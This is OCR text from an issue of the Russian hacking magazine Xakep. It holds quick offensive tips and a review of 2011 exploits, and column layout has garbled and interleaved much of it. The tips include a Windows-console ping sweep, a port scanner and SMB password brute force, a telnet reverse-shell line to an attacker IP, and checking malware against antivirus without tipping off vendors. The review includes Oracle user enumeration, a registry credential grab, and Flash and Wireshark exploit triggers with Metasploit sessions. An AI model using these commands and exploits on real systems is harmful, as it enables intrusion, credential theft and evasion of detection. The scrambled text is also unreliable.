книги хакеры / журнал хакер / 150_Optimized

Easy Hack Хакерские

секреты

простых

вещей

¹ 2 ЗАДАЧА: НАЙТИ ЛЕГКУЮ АЛЬТЕРНАТИВУ

СНИФФЕРАМ НА БАЗЕ WINPCAP.

РЕШЕНИЕ:

ХочупознакомитьтебяснедавнейразработкойNETRESEC—небольшой тулзой, позволяющейснифатьтрафик. ЗовутееRawCap (www.netresec. com/?page=RawCap). Обладаянеслишкомсерьезнойфункциональностью, онаявляетсяотличнымвыборомдлятех, ктопотемилииным причинамнеможетиспользоватьбиблиотекуWinPCAP. Хотьвозможностиееиневелики— мониторингинтерфейсаидампвсеговфайл, но следующиепреимуществазаставляюткнейприсмотреться:

1)Весит она всего 17 Кб;

2)Работает через стандартные raw sockets Windows (о том как реализовать сниффер на базе этой технологии, читай в ста-

тье «Скринсейвер-нюхач» — www.xakep.ru/magazine/ xA/077/112/1.asp);

3)Отсутствие установки;

4)Возможность прослушивания почти любых интерфейсов, включая

WiFi-, loopback- и PPP-интерфейсы.

Изминусовстоитотметитьследующиевещи. Во-первых, позаявле-

¹ 3 ЗАДАЧА: СБОР ИНФОРМАЦИИ, А ТАКЖЕ

ПЕРЕБОР СТАНДАРТНЫМИ СРЕДСТВАМИ WINDOWS.

РЕШЕНИЕ:

Впродолжениепредыдущейзадачидавайпосмотрим, чтоещемы

Снифим трафик. Rawcap — мал да удал.

ниюразработчика— утилитанесовсемкорректноработает(пропускаетпакеты) подWindows 7 (длявходящихпакетов) иподVista (для исходящих). Во-вторых, необходимоприсутствие.NET Framework версии2.0. В-третьих, потребностьвадминскихправах.

Запускаетсятулзаследующимобразом:

RawCap.exe номер_интерфейса имя_файла_дампа

можемсотворитьвконсоли. Конечно, виндоваяконсоль— этото, счем приходитсямириться, ането, чемхочетсяпользоваться, потомучто удобно. Впрочем, этолирика. Итак, ситуацияпримерноследующая. Мы имеемправаобычногопользователянакакой-тотачке. Чтомысэтим можемсделать? Особенно, еслидоступестьтолькокконсоли(т.е. шелл). Конечно, лучшевсегобылобызакачатьтогоилииногософтаинему-

читься. Но, во-первых, могутбытьтрудностисзакачкойфайлов(когда поовниласьмашиназафаерволомипрямогодоступанет), во-вторых, антивирусымогутзадететктить, еслизакачаешькакую-тоересь. Окей. Такчтоженамможетпредложитьвиндоваяконсольистандартные инструменты? Думаешьничего? Какбынитак. Посути, классический набордлясбораинформацииосети, акрометого— возможностьпроведениянекоторыхвидоватак.

КакразобэтомрассказывалEd Skoudis ввебкасте«Penetration Testing Ninjitsu». Записьислайдыможноскачатьздесь(www.coresecurity.com/ content/webcast-series-with-sans).

Яжеприведунесколькопримеровоттуда:

C:\> for /L %i in (1,1,255) do @ping 10.10.10.%i –n 1

| find "Reply"

Здесь for — команданачалацикла; /L — указывает, чтоцикл— счетчик; %i — имяпеременнойцикла;

in (1,1,255) — значенияот1 до255 сшагом1;

do @ping — окончаниециклавыполнениемкомандыping; 10.10.10.%i — IP-адрессподставленнойпеременной; –n 1 — количествопингов;

| find "Reply" — результатаработыпередаутся«|» навходкоманде find, котораяищетслово«Replay».

Каквидишь— всепросто. Такимобразом, мынаходимживыехостыв диапазоне10.10.10.1-255.

Логикуследующихпримеровпояснятьнебуду, уверен, тыразберешься. Добавлюещетолькопарупояснений:

Command1 & Command2 — запускнесколькихкоманд;

Command1 && Command2— запусквторой, толькоприуспешномвыполнениипервой;

>— записьвфайл;

>>— записьвконецфайла; For /F — циклпофайлу;

Command 2 > nul — стандартныйвыводошибокнеотображается;

Command 2 >> errors.txt— ошибкивфайле.

Итак, определяемименахостов:

C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul

¹ 4 ЗАДАЧА: ПРОВЕРИТЬ МАЛВАРЬ НА

ДЕТЕКТИРУЕМОСТЬ БЕЗ СЕРВИСОВ ВРОДЕ VIRUSTOTAL.

РЕШЕНИЕ:

Вмартовскомномереяужеписалпроэтузадачу. Намтребовалось проверитьмалварьнаобнаружаемостьантивирусами, нонехотелось бы, чтобыдикиеэкземплярыпопадаливантивирусныекомпании. Вка- чествезаменыбылипредложеныальтернативныеонлайн-сканеры. Но тольконаплатныхобещалось, чтоэкземплярчикиникуданеуплывут. Тоестьпофакту— половинарешения.

Таквот, альтернативноерешение. Недавномнепришлописьмоот человекасникомHimikat, вкоторомонскинулссылкунапроект «caps12-MultiScanner». Прочитатькраткоеописаниеискачатьможно наантичате— forum.antichat.net/thread266146.html. Сайтпроектас последнейверсиейПО— caps12-security.blogspot.com.

Идеяненова, ивтеориипроэтодажекто-токогда-тописалвжурнал. Сутьее— развернутьвсеантивирусыусебяиусебяжепроверять малварь. Такимобразом, успешныеэкземплярыгарантированноне попадутвантивирусныекомпании.

Основнаяпроблема— скучковатьвсеантивиринаодноймашинебез виртуальныхмашин. Чтоибылорешено. Витогеполучиласьвполне годнаяутилита. Онапозволяетпоселитьводнусистемуцелых13 антивирусов, ионидаженепоругаются. Восновном— этосамыераспро-

Сканирование, используя стандартный ftp-клиент

| find "Name" && echo 10.10.10.%i

Портсканнернабазеftp-клиента:

C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports. txt & echo open 192.168.0.1 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Перебираемлогиныипаролиизфайланадоступкудаленномухоступо

SMB:

C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @ echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Каквидишь, весьнабор: пинг, днс-резолв, портскан, брутфорс. Ивсе вполнеюзабельное. Ачтосамоеприятное— доступно«бесправным» юзерам. Крометого, сборбаннеровибрутфорсдругихпротоколовможно организоватьаналогичнымобразомпосредствомtelnet’а. Жальтолько, чтоегоубралиизвинды, начинаясVista.

Отом, чтовозможностейвnix’ахгораздобольше, можноинеговорить. Тытолькопосмотри, какможноэлегантносделатьреверсивныйшелл черезтелнет:

telnet [attacker_IPaddr] [port1] | /bin/bash | telnet

[attacker_IPaddr] [port2]

Однакоиввиндеможножить.

Остальныеинтересныепримерыищиввеб-касте.

страненныеаверы, однакототжекаспервспискеподдерживаемых отсутствует. Будемнадеяться, чтовследующихверсияхонпоявится

— проект, похоже, встадииактивногоразвития.

Впроцессеиспользованияникакихсложностейневозникает. Основнойалгоритмдействийприпервомзапускеследующий:

1)Запускаем тулзу;

2)Выбираем интересующие нас антивирусы;

3)Программа их скачивает; 4)Обновляет их.

Далеемыможемвыбиратьинтересующуюнас малварьипроверять ее.

Проверка библиотеки, созданной в

MSF двумя антивирями

ВЗЛОМ

РЕШЕНИЕ:

ПродолжаютемуповзломубазыданныхOracle ипотерзаниюодного изосновныхеесетевыхсервисов— TNS listener’а.

СегоднямыпоговоримобавторизациивданнойСУБД. Особенность еезаключаетсявтом, чтоклиентприподключениисначалаотправляетимяпользователя, сервержепроверяетегосуществованиев базе, иеслитаковогонет— отвечает«login denied», иначе— продолжаетсяпроцессавторизации. Такимобразом, основываясьнаответе, мыможемперебиратьименапользователей.

Каквидно, это— классическаяуязвимость. Нооноипонятно— СУБД проектировалидавно, обезопасноститогда, видимо, неособенно думали.

Перебираем имена пользователей

Реализуетподобныйперебор(пословарику) тулза ora-userenum. ОнавходитвOAK (Oracle Assessment Kit), который написалDavid Litchfield (www.databasesecurity.com/dbsec/OAK. zip). Исходникиприлагаются, такчтоутилитуможноподправитьпо собственнымнуждам.

Примериспользования:

ora-userenum.exe 192.168.0.1 1521 ORCL1 userlist.txt

Где 192.168.0.1 1521 — адресипортOracle;

ORCL1 — SID базыданных;

userlist.txt — именапользователейдляперебора(стандартный словарьвходитвOAK).

ПеребравименапользователейБД, можнобудетперейтикследующемушагу— подборупаролей, окотороммыещепоговорим.

¹ 6 ЗАДАЧА: НАЙТИ ЛЕГКОВЕСНУЮ И

ПРОСТУЮ АЛЬТЕРНАТИВУ METASPLOIT FRAMEWORK.

nmap --script oracle-brute -p 1521 --script-args oracle-

brute.sid=ORCL <target>

ПередачаDNS-зоны:

РЕШЕНИЕ:

ВпоследнеевремяMSF всечащепривлекаетксебевнимание. Онвсе растетирастет. Выходятновыеверсии. Оноблепляетсяновымимодулями, новымивозможностями. И, чтониговори, инструментотличный. Многиеизтех, ктораньшепростоприсматривались, сейчасуже вплотнуюперебралисьнаMSF илиегоплатныеварианты. Носростом онявнопотерялвоперативности, даиневсемодулинеподвсеми ОСработают, кое-чтонадодоустанавливать. Хотявтораятрудность решаетсяиспользованиемподготовленныхдистрибутивоввроде BackTrack. Кстати, ужевышлапятаяверсияBT, чемумывсеможем толькопорадоваться. Новозвращаяськнашейзадаче, могусказать, чтоеслинадосделатьчто-тооперативно, тонаMSF даженесмотри. Nmap сегоNSE (Nmap Scripting Engine) движком— вотреальное решение. Особенно, сучетомтого, чтоскриптыдлядвижкавовсюразмножаются. Полныйихсписоктут: nmap.org/nsedoc.

Теперькпримерам.Брутфорсимкомьюнити-стрингикsnmp-сервису:

nmap -p53 –script dns-zone-transfer –script-args

dnszonetransfer.domain=example.com <target>

ПроверкахостовнаосновныеуязвимостивSMB-протоколе. Самое интересное— MS08-067:

nmap -p445 –script=smb-check-vulns <target>

НаходимвсетихостысMSSQL-серверомиполучаеминфу(версия, порт) оних:

nmap --script broadcast-ms-sql-discover

Всегоскриптовпорядка200. Крометого, естьцелаякучабиблиотек, позволяющаясамостоятельноразрабатыватьновыескрипты.

ниябекапасистемы— ntbackup.exe. ЗапуститьееможноивГУИ, ив ЗАДАЧА: ВЫНУТЬ УЧЕТНЫЕ ЗАПИСИ ИЗ консольномварианте. Особенностьеесостоитвтом, чтоонаможет РЕЕСТРА WINDOWS. использоватьфичувинды— Volume Shadow Copy (VSS). Этопозволяет ейбекапитьзалоченныефайлы. Посути, всечтонампотребуется, так

этовыполнитьследующуюкоманду:

Ntbackup.exe backup systemstate /j "Blah-blah-blah" /f

ВЗЛОМ

iv (ivinside.blogspot.com)

pikofarad (115612, дер. Красная звездочка, д.1)

ОБЗОР ЭКСПЛОЙТОВ

Разбираем

свежие

уязвимости

01УЯЗВИМОСТЬ В ADOBE FLASH

PLAYER 10.2.153.1 SWF

CVSSV2

9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

Датарелиза: 11 апреля 2011

Автор: sinn3r

CVE id: CVE-2011-0611

Flash Player представляет собой виртуальную машину, на которой выполняется загруженный из интернета код flash-программ. Важный недостаток flash-приложений заключается в недостаточном контроле ошибок, что приводит к частым отказам как самих приложений, так, в некоторых случаях, и всего браузера. Возможность флешовых приложений нарушать работу всего браузера неоднократно вызывала критику со стороны разработчиков браузеров.

В этот раз мы рассмотрим сбой в Adobe Flash Player, который происходит из-за неправильного использования типа объекта, что позволяет атакующему перезаписать указатель в памяти и в результате добиться исполнения произвольного кода, иначе говоря, перехватить контроль над системой, подверженной данной уязвимости. На данный момент эта уязвимость активно используется для распространения разнообразной малвари: эксплоиты для бага вошли в используемые злоумышленниками сплойтпаки.

Векторы вторжения: Adobe Flash Player, Adobe Reader и Acrobat, Microsoft Word/Excel (включение .wf-файлов в doc- и xls-файлы соответственно). Справедливости ради нужно отметить, что Adobe Reader X в защищенном режиме работы использует sandbox и пресекает исполнение произвольного кода, несмотря на существование уязвимости. Впрочем, это обстоятельство мало что меняет :).

EXPLOIT

Уязвимый вызов располагается по адресу 0x100d01f6 в библиотеке

Flash10o.ocx (для версии плагина Adobe Flash Player 10.2.153.1).

Код ActionScript, позволяющий достигнуть уязвимого места:

Date.prototype.c_fun = SharedObject.prototype.getSize; Date.prototype.getDay = function ()

{

this.c_fun(); };

var eval(0) = new Date(1.41466385537348e-315); (eval(0)).getDay();

Дальнейшийанализуязвимости, вызваннойвышеприведенным кодом, показывает, чтомыимеемочереднуюнеразберихустипом объекта, произошедшуювSharedObject.prototype.getSize(), когда классDate расширяетсядобавлениемпользовательскойфункции,

полученнойчерезSharedObject.prototype.getSize. ОбъектDate ини-

циализируетсязначением1.41466385537348e-315, котороеприсохранениивпамятипреобразуетсяв0x11111110, аон, всвоюочередь, подходитдляреализациитехникиheap spraying. Когдавызывается пользовательскаяфункцияDate.c_fun(), управлениепередаетсяв

SharedObject.prototype.getSize(), вкоторойпроисходитнекоррект-

наяинтерпретацияпередаваемогообъектаDate какимеющеготип SharedObject, врезультатечегосовершаетсяпопыткаиспользовать значение, которымбылинициализированобъектDate (0x11111110), какуказательнатаблицувиртуальныхфункций. Используямодульиз metasploit, запустимнаподверженнойуязвимостимашинекалькулятор:

msf > use exploit/windows/browser/adobe_flashplayer_

flash10o

Ошибка в библиотеке Flash10o.ocx

msf exploit(…) > set PAYLOAD windows/exec PAYLOAD => windows/exec

msf exploit(…) > set CMD calc.exe CMD => calc.exe

msf exploit(…) > exploit

[*]Exploit running as background job. msf exploit(adobe_flashplayer_flash10o) >

[*]Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B

[*]Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B

[*]Server started.

Сервер запущен. Теперь от нас требуется только пройти по предо-

ставленной ссылке (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B)

и мы сможем смиренно, затаив дыхание наблюдать за тем, как Internet Explorer превращается в калькулятор...

TARGETS

IE 6/7 на Windows XP SP3 и Windows Vista.

SOLUTION

Обновить Adobe Flash Player.

02 ПЕРЕПОЛНЕНИЕ БУФЕРА НА СТЕКЕ В WIRESHARK <= 1.4.4 PACKET-DECT.C

CVSSV2

9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

Датарелиза: 18 апреля 2011

Авторы: Paul Makowski — провел первоначальное исследование, sickness — реализовал POC, corelanc0d3r — создал эксплоит, ис-

пользующий ROP + модуль для metasploit.

CVE id: CVE-2011-1591

Wireshark (ранее Ethereal) — это один из лучших анализаторов сетевого трафика, доступных на сегодняшний момент. Имеет графический пользовательский интерфейс.

Функциональность, которую предоставляет Wireshark, очень схожа с возможностями программы tcpdump, однако Wireshark имеет графический пользовательский интерфейс и гораздо так же больше возможностей по сортировке и фильтрации информации.

Программа позволяет пользователю просматривать весь проходящий по сети трафик в режиме реального времени, переводя сетевую карту в неразборчивый режим (promiscuous mode). Wireshark «знает» структуру самых различных сетевых протоколов и поэтому позволяет разобрать сетевой пакет, отображая значение каждого поля протокола любого уровня.

Поскольку для захвата пакетов используется pcap, существует возможность захвата данных только из тех сетей, которые поддерживаются этой библиотекой. Тем не менее, Wireshark умеет работать с множеством форматов входных данных, соответственно, можно открывать файлы данных, захваченных другими программами, что расширяет возможности захвата.

EXPLOIT

Уязвимое место в коде (исходный код wireshark 1.4.1, packetdect.c, строка 1886):

ВЗЛОМ

Wireshark собственной персоной

...

/* fill B-Field */ if(pkt_len>DECT_PACKET_INFO_LEN+2)

memcpy((char*)(&(pkt_bfield.Data)), (char*)(pkt_ptr+8), pkt_len-5-8); // <--- уязвимое место

else

memset((char*)(&(pkt_bfield.Data)), 0, 128); pkt_bfield.Length=pkt_len-DECT_PACKET_INFO_LEN-8;

...

pkt_bfield представляет собой структуру типа dect_bfield, описание которой приведем ниже:

struct dect_bfield

{

guint8 Data[128]; guint8 Length;

};

Каквидно, происходиткопированиеданныхпакетав128-байтный буферData, располагающийсянастеке. Длятогочтобылицезреть уязвимостьвоочию, намнадобудетсформироватьопределенным образомpcap-файлиотправитьегонанужныйинтерфейс. Например, этогоможнодобиться, используяпрекраснуювещьпод названиемscapy:

#!/usr/bin/env python import sys

from scapy import * wrpcap("test.pcap",Ether(type=0x2323)/("A"*1000))

Запускаем wireshark, заставляем его слушать нужный нам ин-

терфейс и шлем ему привет в виде только что сформированного пакета:

# tcpreplay -i ath0 -t test.pcap

Ровно один пакет — и wireshark с грохотом падает ниц. Ну а теперь, воспользуемся благами цивилизации в виде модуля для metasploit и сформируем эксплоит с классической, полезной нагрузкой в виде запуска калькулятора:

msf exploit(wireshark_packet_dect) > use exploit/windows/ fileformat/wireshark_packet_dect

msf exploit(wireshark_packet_dect) > set PAYLOAD windows/exec PAYLOAD => windows/exec

msf exploit(wireshark_packet_dect) > set CMD calc.exe CMD => calc.exe

msf exploit(wireshark_packet_dect) > exploit

[*]Creating 'passwords.pcap' file ...

[*]Preparing payload

[*]Writing payload to file, 1554 bytes

[*]Generated output file /opt/framework-3.6.0/msf3/data/ exploits/passwords.pcap

Запускаем wireshark, ставим прослушку интерфейса. Отправляем вредоносный пакет:

# tcpreplay -i ath0 -t /opt/framework-3.6.0/msf3/data/

exploits/passwords.pcap

Наблюдаем калькулятор :)

TARGETS

Win32 (Обход защитных механизмов DEP & ASLR).

Переходим на страничку, содержащую вредоносный flash-контент

SOLUTION

Обновить Wireshark.

03 МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ В ZYXEL ZYWALL USG

CVSSV2

9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

СерияжелезокZyWALL USG — новоекомплексноерешениеот ZyXEL дляобеспеченияинформационнойбезопасностииуправлениятрафиком, включаяфункциональнуюнастраиваемуюзащитуот спама, контрольполосыпропусканиядляразнообразныхобъектовcети, предотвращениевторженийибезопасностьудаленных подключенийприпомощивиртуальныхчастныхсетей. Вначале маянемецкаягруппаRedTeam Pentesting опубликовалаотчето двухуязвимостяхвэтихустройствах, найденныхимивходеодного изпентестов: обходаутентификациииповышениепривилегий. В результатеэксплуатациипервойуязвимостинеаутентифицированныепользователимогутскачиватьизагружатьконфигурационныефайлывустройства, которыеприменяютсяавтоматически. В результатеиспользованиявторогобагапользовательсограничен- нымиправамиможетстатьадминомименятьчерезвеб-интерфейс любыенастройки.

EXPLOIT

Обновления прошивок для устройств ZyXEL ZyWALL USG представляют собой обычный zip-архив, в котором также находятся еще два зашифрованных zip-архива с основной прошивкой.

Например, архив с прошивкой 2.21(BQD.2) для ZyWALL USG 20 («ZyWALL USG 20_2.21(BDQ.2)C0.zip») содержит следующие файлы:

221BDQ2C0.bin 221BDQ2C0.conf (7354 bytes) 221BDQ2C0.db

221BDQ2C0.pdf

221BDQ2C0.ri firmware.xml

Файлы221BDQ2C0.bin и221BDQ2C0.db, несмотрянауказанное расширение, являютсязашифрованнымиzip-архивами(кстати, в анализетипафайлавсемлинуксоидамможетпомочьстандартная утилита/usr/bin/file). Можнопросмотретьсписокфайловвэтих архивах:

$ unzip -l 221BDQ2C0.bin

Archive: 221BDQ2C0.bin

Name

----

compress.img

db/

db/etc/

db/etc/zyxel/

db/etc/zyxel/ftp/

db/etc/zyxel/ftp/conf/ db/etc/zyxel/ftp/conf/htm-default.conf db/etc/zyxel/ftp/conf/system-default.conf (7354 bytes)

...

filechecksum filelist fwversion kernelchecksum kernelusg20.bin wtp_image/

-------

24 files

$ unzip -l 221BDQ2C0.db Archive: 221BDQ2C0.db Name

----

db_remove_lst etc/

...

etc/zyxel/

etc/zyxel/ftp/

etc/zyxel/ftp/.dha/ etc/zyxel/ftp/.dha/dha_idp/ etc/zyxel/ftp/cert/ etc/zyxel/ftp/cert/trusted/ etc/zyxel/ftp/conf/ etc/zyxel/ftp/conf/htm-default.conf

etc/zyxel/ftp/conf/system-default.conf (7354 bytes)

...

filelist

-------

31 files

Былообнаружено, чторазмерфайла221BDQ2C0.conf изглавного архивавточностисовпадаетсразмеромфайлаsystem-default.conf иззашифрованныхархивов. Такойфактнеможетненамекатьна успешноеприменениеизвестнойизобластикриптоанализаатаки сизвестнымоткрытымтекстом, чтоибылопроделаноспомощью следующихутилит:

•PkCrack отПитераКонрада;

•Elcomsoft Advanced Archive Password Recovery ототечественного производителя.